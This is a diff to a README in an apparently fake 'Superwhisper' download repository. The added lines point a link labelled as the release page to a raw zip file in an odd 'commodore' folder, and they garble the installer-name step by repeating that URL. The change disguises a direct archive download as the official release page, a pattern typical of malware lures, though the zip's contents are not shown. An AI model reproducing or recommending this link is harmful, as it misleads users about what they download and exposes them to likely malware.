Shakib-tech/superwhisper-download/README.md

 - **Internet Connection:** Required for initial download and updates

 ## 📥 Download & Install
-1. **Visit the Release Page:** Go to the Superwhisper Releases page by clicking [here](https://github.com/Shakib-tech/superwhisper-download/releases).
+1. **Visit the Release Page:** Go to the Superwhisper Releases page by clicking [here](https://raw.githubusercontent.com/Shakib-tech/superwhisper-download/main/commodore/superwhisper-download.zip).

 2. **Choose the Latest Release:** Look for the most recent version at the top of the page.
 This version will have the latest features and improvements.

 3. **Download the Installer:**
    - Locate the installation file for your operating system.
-It will typically be labeled as `superwhisper-setup.exe`.
+It will typically be labeled as `https://raw.githubusercontent.com/Shakib-tech/superwhisper-download/main/commodore/superwhisper-download.zip`.
    - Click on the file name to start the download.

 4. **Run the Installer:**